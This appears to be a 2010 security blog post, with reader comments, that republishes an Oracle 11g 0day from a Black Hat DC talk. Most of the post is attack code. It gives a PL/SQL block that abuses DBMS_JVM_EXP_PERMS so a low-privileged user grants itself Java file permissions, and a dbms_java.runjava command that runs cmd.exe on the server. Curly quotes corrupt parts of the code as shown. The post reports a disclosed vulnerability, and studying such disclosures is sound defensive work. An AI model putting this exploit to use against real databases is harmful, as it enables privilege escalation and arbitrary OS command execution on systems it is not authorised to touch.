David Litchfield’s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:
Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,'ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).
However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:
select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;
Here is the link of the talk video:
https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov
7:42 am on February 6th, 2010
[...] just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is was [...]
7:29 pm on February 9th, 2010
btw, the video is now online again:
https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-Oracle11g-video.m4v
9:22 pm on February 10th, 2010
[...] 10.2.0.4), pero no fue solucionado en los parches de seguridad de enero. Por lo que ha decidido hacerlo público (”11g 0day exploit”) durante la conferencia Black Hat en Washington el [...]
6:42 pm on February 12th, 2010
[...] Il codice fornito da Litchfield e presente sul sito notsosecure. [...]
2:58 pm on May 7th, 2010
i like this post. great post and great blog.